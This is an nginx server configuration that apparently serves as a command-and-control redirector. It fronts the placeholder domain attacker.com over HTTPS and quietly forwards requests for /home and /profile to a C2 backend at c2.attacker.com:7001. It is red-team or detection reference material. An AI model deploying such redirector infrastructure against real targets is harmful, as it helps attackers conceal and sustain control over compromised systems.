server {
    listen 443;
    server_name attacker.com;

    ssl on;
    ssl_certificate /etc/letsencrypt/live/attacker.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/attacker.com/privkey.pem;

    root /var/www/html-nginx;

    location /home {
        proxy_pass https://c2.attacker.com:7001 ;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

    location /profile {
        proxy_pass https://c2.attacker.com:7001 ;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
